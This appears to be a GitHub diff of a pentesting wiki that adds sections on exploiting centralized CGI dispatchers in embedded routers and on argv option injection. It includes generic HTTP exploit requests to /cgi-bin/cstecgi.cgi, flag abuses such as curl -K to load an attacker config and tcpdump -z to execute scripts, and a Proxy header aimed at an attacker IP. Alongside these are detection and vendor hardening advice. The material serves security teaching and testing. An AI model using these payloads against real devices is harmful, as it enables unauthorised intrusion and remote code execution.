You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
## Centralized CGI dispatchers (single endpoint routing via selector parameters)
63
63
64
-
CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com"
64
+
Many embedded web UIs multiplex dozens of privileged actions behind a single CGI endpoint (for example, `/cgi-bin/cstecgi.cgi`) and use a selector parameter such as `topicurl=<handler>` to route the request to an internal function.
65
65
66
-
As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server.
66
+
Methodology to exploit these routers:
67
+
68
+
- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, or unpack firmware and grep for handler strings used by the dispatcher.
69
+
- Test unauthenticated reachability: some handlers forget auth checks and are directly callable.
70
+
- Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`.
71
+
72
+
Generic exploit shapes:
73
+
74
+
```http
75
+
POST /cgi-bin/cstecgi.cgi HTTP/1.1
76
+
Content-Type: application/x-www-form-urlencoded
77
+
78
+
# 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools
79
+
topicurl=<handler>¶m=-n
80
+
81
+
# 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell
- Watch for unauthenticated requests to centralized CGI endpoints with `topicurl` set to sensitive handlers.
91
+
- Flag parameters that begin with `-` (argv option injection attempts).
92
+
- Vendors: enforce authentication on all state-changing handlers, validate using strict allowlists/types/lengths, and never pass user-controlled strings as command-line flags.
67
93
68
94
## Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\)
**More info about the vuln and possible exploits:**[**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,**[**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,**[**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,**[**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
82
108
109
+
## **Proxy \(MitM to Web server requests\)**
83
110
84
-
{{#include ../../banners/hacktricks-training.md}}
111
+
CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com"
112
+
113
+
As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server.
85
114
115
+
## **References**
86
116
117
+
-[Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024).
160
160
161
+
### Argument/Option injection via leading hyphen (argv, no shell metacharacters)
162
+
163
+
Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell.
164
+
165
+
Typical places where this appears:
166
+
167
+
- Embedded web UIs/CGI handlers that build commands like `ping <user>`, `tcpdump -i <iface> -w <file>`, `curl <url>`, etc.
168
+
- Centralized CGI routers (e.g., `/cgi-bin/<something>.cgi` with a selector parameter like `topicurl=<handler>`) where multiple handlers reuse the same weak validator.
169
+
170
+
What to try:
171
+
172
+
- Provide values that start with `-`/`--` to be consumed as flags by the downstream tool.
173
+
- Abuse flags that change behavior or write files, for example:
174
+
-`ping`: `-f`/`-c 100000` to stress the device (DoS)
175
+
-`curl`: `-o /tmp/x` to write arbitrary paths, `-K <url>` to load attacker-controlled config
176
+
-`tcpdump`: `-G 1 -W 1 -z /path/script.sh` to achieve post-rotate execution in unsafe wrappers
177
+
- If the program supports `--` end-of-options, try to bypass naive mitigations that prepend `--` in the wrong place.
178
+
179
+
Generic PoC shapes against centralized CGI dispatchers:
180
+
181
+
```
182
+
POST /cgi-bin/cstecgi.cgi HTTP/1.1
183
+
Content-Type: application/x-www-form-urlencoded
184
+
185
+
# Flip options in a downstream tool via argv injection
186
+
topicurl=<handler>¶m=-n
187
+
188
+
# Unauthenticated RCE when a handler concatenates into a shell
0 commit comments